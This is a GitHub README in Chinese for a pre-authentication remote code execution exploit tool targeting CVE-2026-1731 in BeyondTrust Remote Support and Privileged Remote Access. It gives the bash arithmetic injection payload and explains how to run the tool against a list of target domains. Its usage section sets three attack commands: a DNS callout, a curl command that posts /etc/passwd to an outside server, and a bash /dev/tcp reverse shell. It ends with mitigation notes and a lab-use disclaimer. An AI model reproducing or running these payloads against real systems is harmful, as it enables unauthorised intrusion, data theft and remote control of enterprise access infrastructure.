LutfifakeeXone/CVE-2026-1731
GitHub: LutfifakeeXone/CVE-2026-1731
针对 BeyondTrust RS/PRA 产品的 CVE-2026-1731 命令注入漏洞的预认证 RCE 利用工具。
Stars: 0 | Forks: 0
# 🚨 CVE-2026-1731 — BeyondTrust Pre-Auth RCE 漏洞利用
## 📖 概述
**CVE-2026-1731** 是一个 **严重的命令注入漏洞**,允许在 BeyondTrust 产品中进行 **未经身份验证的远程代码执行 (RCE)**。
### 🎯 受影响产品
| 产品 | 受影响版本 |
|--------|--------------------|
| **BeyondTrust Remote Support (RS)** | ≤ 25.3.1 |
| **BeyondTrust Privileged Remote Access (PRA)** | ≤ 24.3.4 |
## 🧠 技术细节
该漏洞存在于以下脚本中:
```
thin-scc-wrapper
```
该脚本对攻击者控制的输入 (`remoteVersion`) 执行 Bash 算术评估。
问题在于:
- Bash 将操作数视为 **表达式**,而非普通字符串
- 这允许注入如下 payload:
```
a[$(command)]0
```
➡️ 此 payload 会导致 **任意命令执行**
## ⚙️ 环境要求
请确保您的环境已正确配置:
### 📦 安装依赖
```
pip3 install requests
```
### 🔌 安装 WebSocket Client
```
wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat
sudo mv websocat /usr/local/bin/
```
## 📂 目标列表
创建一个名为 `domains.txt` 的文件:
```
target1.example.com
target2.example.com
192.168.1.100
```
## 🚀 使用方法
### 1. 配置 Payload
编辑 `exploit.py`:
#### 🔍 Blind RCE (测试)
```
CMD = "nslookup your-domain.burpcollaborator.net"
```
#### 📤 数据窃取
```
CMD = "curl -X POST -d @/etc/passwd http://your-server.com/"
```
#### 🐚 Reverse Shell
```
CMD = "bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1"
```
### 2. 运行 Exploit
```
python3 exploit.py
```
## 🖥️ 示例输出
```
== Checking target1.example.com ==
Company: PT-12345
Running WebSocket action...
[target1.example.com] WebSocket output:
Connection established
Command executed successfully
```
## 🔎 详细模式
在 `exploit.py` 中启用 debug 模式:
```
VERBOSE = True
```
➡️ 这将显示:
- 目标 URL
- 已发送的 payload
- 详细响应
## ⚠️ 重要提示
- 此脚本仅在以下情况下才能正常运行:
- 目标存在漏洞
- `websocat` 已安装且可用
- 如果您遇到:
**错误:`websocat not found`**
- 请确保 `websocat` 位于:
- 与脚本相同的目录中,**或者**
- `/usr/local/bin/`
**错误:`ModuleNotFoundError`**
- 安装所需的 Python 模块:
pip3 install requests
## 📁 项目结构
```
CVE-2026-1731/
├── exploit.py # Main exploit script
├── domains.txt # Target list
├── websocat # WebSocket client
├── README.md # Documentation
└── DISCLAIMER.md # Legal disclaimer
```
## 🛡️ 缓解措施
立即更新到最新的修补版本:
- BeyondTrust Security Advisory:**BT26-02**
附加建议:
- 限制服务的网络访问
- 使用 WAF / IDS 保护
- 监控可疑活动
## 📚 参考资料
- Rapid7 Analysis (Attackerkb)
- NVD (National Vulnerability Database)
- BeyondTrust Security Center
## ⚖️ 许可证
MIT License
## 🚫 法律免责声明
此工具仅可用于:
- **实验室环境、测试或研究**
- 拥有 **明确的书面授权**
未经授权的使用可能违反:
- 当地网络犯罪法律
- 国际网络安全法规
## ⭐ 备注
如果您觉得此仓库有用:
- ⭐ Star 此仓库
- 🔥 负责任地使用
- 🧠 保持道德,遵守法律
标签:Bash算术评估, BeyondTrust, CISA项目, CVE-2026-1731, PoC, Python, WebSocket, 企业安全, 依赖分析, 关键漏洞, 利用脚本, 协议分析, 命令注入, 安全漏洞, 应用安全, 数据展示, 数据窃取, 无后门, 暴力破解, 权限提升, 特权远程访问, 红队, 编程工具, 网络安全, 网络资产管理, 远程代码执行, 远程控制, 远程支持, 远程访问, 逆向Shell, 隐私保护, 预认证RCE